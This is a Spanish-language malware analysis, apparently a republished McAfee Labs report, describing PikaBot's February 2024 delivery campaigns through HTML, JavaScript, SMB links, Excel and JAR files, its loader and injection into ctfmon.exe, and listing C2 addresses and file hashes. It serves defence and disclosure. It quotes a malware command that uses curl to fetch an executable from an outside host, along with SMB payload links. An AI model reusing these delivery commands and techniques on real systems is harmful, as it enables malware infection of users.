Escrito por Anuradha y Preksha Introducción PikaBot es una puerta trasera maliciosa que ha estado activa desde principios de 2023. Su diseño modular se compone de un cargador y un componente central. El módulo central realiza operaciones maliciosas, lo que permite la ejecución de comandos y la inyección de cargas útiles desde un servidor de comando y control. El malware emplea un inyector de código para descifrar e inyectar el módulo central en un proceso legítimo. En particular, PikaBot emplea métodos de distribución, campañas y comportamientos que recuerdan a Qakbot. Métodos de distribución PikaBot, junto con otros cargadores maliciosos como QBot y DarkGate, depende en gran medida de las campañas de correo no deseado para su distribución. Sus estrategias de acceso inicial están elaboradas de forma intrincada y utilizan correos electrónicos no deseados dirigidos geográficamente y adaptados a países específicos. Estos correos electrónicos suelen incluir enlaces a recursos compartidos de bloques de mensajes del servidor (SMB) externos que alojan archivos zip maliciosos. Los recursos compartidos SMB se refieren a recursos o carpetas en un servidor o computadora accesibles para otros dispositivos o usuarios en una red que utiliza el protocolo SMB. Los actores de amenazas frecuentemente explotan dichos recursos compartidos para la distribución de malware. En este caso, el acto de descargar y abrir el archivo zip proporcionado provoca la infección de PikaBot. Campañas distintivas Durante febrero de 2024, McAfee Labs observó un cambio significativo en las campañas que distribuyen Pikabot. Pikabot se distribuye a través de múltiples tipos de archivos por diversos motivos, según los objetivos y la naturaleza del ataque. El uso de múltiples tipos de archivos permite a los atacantes explotar diversos vectores de ataque. Diferentes formatos de archivos pueden tener diferentes vulnerabilidades y diferentes formas de detección por parte del software de seguridad, por lo que los atacantes pueden probar varios formatos para aumentar sus posibilidades de éxito y evadir la detección eludiendo medidas de seguridad específicas. Los atacantes suelen utilizar tipos de archivos en los que los usuarios suelen confiar, como documentos Zip u Office, para engañar a los usuarios para que los abran. Al utilizar tipos de archivos familiares, los atacantes aumentan la probabilidad de que sus objetivos interactúen con el contenido malicioso. Los autores de malware utilizan HTML con funciones de JavaScript como archivos adjuntos, una técnica común, particularmente cuando el formato del correo electrónico se convierte a texto sin formato, lo que da como resultado que el contenido HTML se adjunte directamente al correo electrónico. Los atacantes utilizan SMB para propagarse a través de la red y pueden apuntar específicamente a recursos compartidos de SMB para difundir su malware de manera eficiente. Pikabot aprovecha el error de MonikerLink y adjunta un enlace SMB en el propio correo de Outlook. Figura 1. Campañas distintivas de los atacantes de Pikabot demostraron una amplia gama de técnicas y vectores de infección en cada campaña, con el objetivo de entregar la carga útil de Pikabot. A continuación hemos resumido el vector de infección que se ha utilizado en cada campaña. HTML Javascript SMB Compartir Excel JAR Es poco común que un adversario implemente tantos vectores de ataque en el lapso de un mes. Análisis de campaña En esta sección, a continuación se presenta un desglose completo del análisis de cada campaña. 1.Campaña HTML En esta campaña, Pikabot se distribuye a través de un archivo zip que incluye un archivo HTML. Este archivo HTML luego procede a descargar un archivo de texto, lo que finalmente resulta en la implementación de la carga útil. El siguiente código HTML es un fragmento del malware, donde se trata de un HTML correctamente alineado que tiene una meta redirección del cuerpo a un archivo de texto remoto alojado en la URL especificada. Hay distracciones en el HTML que el navegador no representa. Figura 2. Código HTML La metaetiqueta resaltada arriba activa una actualización inmediata de la página y redirige el navegador a la URL especificada: ‘archivo://204.44.125.68/mcqef/yPXpC.txt’. Parece ser la URL de un archivo que apunta a un archivo de texto en un servidor remoto. Estas son algunas de las razones por las que un atacante podría elegir una actualización de metaetiquetas en lugar de redirecciones tradicionales: Sigilo y evasión: las actualizaciones de metaetiquetas pueden ser menos notorias que las redirecciones HTTP. Algunas herramientas de seguridad y mecanismos de detección pueden centrarse más en identificar y bloquear patrones de redireccionamiento conocidos. Ejecución del lado del cliente: las actualizaciones de metaetiquetas se producen en el lado del cliente (en el navegador del usuario), mientras que las redirecciones HTTP normalmente las maneja el servidor. Esto puede permitir a los atacantes ejecutar ciertas acciones directamente en la máquina del usuario, lo que dificulta la detección y el análisis. Comportamiento dinámico: las actualizaciones de metaetiquetas se pueden generar e insertar dinámicamente en páginas web, lo que permite a los atacantes cambiar los objetivos de redireccionamiento con mayor facilidad y frecuencia. Este comportamiento dinámico puede dificultar que los sistemas de seguridad se mantengan al día con el panorama de amenazas en evolución. En esta campaña, McAfee bloquea el archivo HTML. Figura 3.Archivo HTML 2. Campaña Javascript Distribuido a través de un archivo zip comprimido, el paquete incluye un archivo .js que posteriormente inicia la ejecución de curl.exe para recuperar la carga útil. Cadena de infección: .zip->.js->curl->.exe Fragmento de código del archivo .js: Figura 4. Código Javascript Cuando se ejecuta JavaScript, activa cmd.exe para generar directorios en la unidad C: e inicia curl .exe para descargar la carga útil. Dado que la URL «hxxp://103.124.105.147/KNaDVX/.dat» está inactiva, la carga útil no se descarga en la siguiente ubicación. Línea de comando: ‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –salida C:\Dthfgjhj fj\ Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’ McAfee bloquea tanto el archivo javascript como el exe, lo que protege a los clientes de McAfee de esta campaña. Figura 5. Archivo JS Figura 6. Archivo EXE 3. Campaña compartida SMB: En esta campaña, Malware aprovecha el error MonikerLink distribuyendo malware a través de conversaciones de correo electrónico con hilos de discusión más antiguos, donde los destinatarios reciben un enlace para descargar la carga útil desde un recurso compartido SMB. El enlace está directamente presente en ese correo de Outlook. Cadena de infección: EML ->enlace compartido de SMB->.zip->.exe Correo electrónico no deseado: Figura 7. Correo electrónico no deseado con enlace compartido de SMB Enlace compartido de SMB: file://newssocialwork.com/public/FNFY.zip En esta campaña, McAfee bloquea con éxito el archivo ejecutable descargado del recurso compartido SMB. Figura 8. Archivo EXE 4: Campaña de Excel Figura 9. Cara en la cadena de infección de Excel: .zip >.xls > .js > .dll Esta semana, los actores de amenazas introdujeron un método novedoso para distribuir su malware Pikabot. Los usuarios objetivo recibieron una hoja de cálculo de Excel que les pedía que hicieran clic en un botón incrustado para acceder a «archivos de la nube». Al pasar el cursor sobre el botón «Abrir», podemos ver un enlace para compartir archivos SMB: file:///\\85.195.115.20\share\reports_02.15.2024_1.js. Archivos empaquetados en Excel: Figura 10. Archivos empaquetados dentro de Excel El archivo de Excel no incorpora ninguna macro, pero incluye un hipervínculo que dirige a un recurso compartido SMB para descargar el archivo JavaScript. El hipervínculo está presente en el siguiente archivo de relación. Figura 11. Archivo de relaciones XML Contenido del archivo de relaciones: Figura 12. xl/drawings/_rels/drawing1.xml.rels Código del archivo JS: Figura 13. Código javascript ofuscado El archivo JS contiene principalmente códigos basura y un pequeño fragmento de código malicioso que descarga el archivo DLL de carga útil guardado como “nh.jpg”. Figura 14. Llamada a regsvr32.exe La carga útil de la DLL descargada se ejecuta mediante regsvr32.exe. En esta campaña, McAfee bloquea el archivo XLSX. Figura 15. Archivo XLSX 5. Campaña JAR En esta campaña, la distribución se realizó a través de un archivo zip comprimido, el paquete incluye un archivo .jar que al ejecutarse elimina el archivo DLL como carga útil. Cadena de infección: .zip>.jar>.dll Durante la extracción, los siguientes archivos se encuentran dentro del archivo jar. Figura 16. Extracción del archivo JAR El archivo MANIFEST indica que hBHGHjbH.class sirve como clase principal en los archivos proporcionados. El archivo jar durante la ejecución carga el archivo «163520» como recurso y lo coloca como .png en la ubicación %temp%, que es el archivo DLL de carga útil. Figura 17. Carga útil con extensión .png Después de esto, java.exe inicia la ejecución de regsvr32.exe para ejecutar la carga útil. En esta campaña, McAfee bloquea los archivos JAR y DLL. Figura 18. Archivo JAR Figura 19. Archivo DLL Análisis de carga útil de Pikabot: Cargador de Pikabot: debido a una entropía relativamente alta de la sección de recursos, la muestra aparece empaquetada. Figura 20. Loader Entropy Inicialmente, el malware asigna memoria usando VirtualAlloc () y, posteriormente, emplea un bucle de descifrado personalizado para descifrar los datos, lo que da como resultado un archivo PE. Figura 21. Bucle de descifrado Figura 22. Descifrado para obtener el módulo principal del archivo PE. : Una vez descifrados los datos, se procede a saltar al punto de entrada del nuevo archivo PE. Cuando se ejecuta este archivo PE, inyecta el contenido malicioso en ctfmon.exe con el argumento de línea de comando “C:\Windows\SysWOW64\ctfmon.exe -p 1234” Figura 23. Inyección con ctfmon.exe Para evitar una doble infección, emplea un valor mutex codificado {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} llamando a CreateMutexW(), seguido de una llamada a GetLastError() para comprobar el último código de error. Figura 24. Comunicación de red Mutex: el malware recopila los datos de la máquina víctima y los envía al servidor C2. Figura 25. Actividad de red PIKABOT realiza comunicación de red a través de HTTPS en puertos no tradicionales (2221, 2078, etc.). Figura 26. Actividad de red Comunicación del servidor C2: Figura 27. IOC de comunicación C2: C2 encontrado en la carga útil son: 178.18.246.136:2078 86.38.225.106:2221 57.128.165.176:1372 Tipo de archivo SHA 256 ZIP 800fa26f895d65041ddf12c42 1b73eea7f452d32753f4972b05e6b12821c863a HTML 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82 ZIP 4c29552b5fcd20e5ed8ec72dd345 f2ea573e65412b65c99d897761d97c35ebfd JS 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849 EXE 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 ZIP f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512 EXE aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1 XLSX bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5 JS 49d 8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72 ZIP d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04 JAR d26ab01b2 93b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4 DLL 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e Presentación de McAfee+ Protección contra robo de identidad y privacidad para su vida digital Descargue McAfee+ ahora \x3Cimg height=»1″ width=»1″ style=»display:none» src =»https://www.facebook.com/tr?id=766537420057144&ev=PageView&noscript=1″ />\x3C/noscript>’);

Source link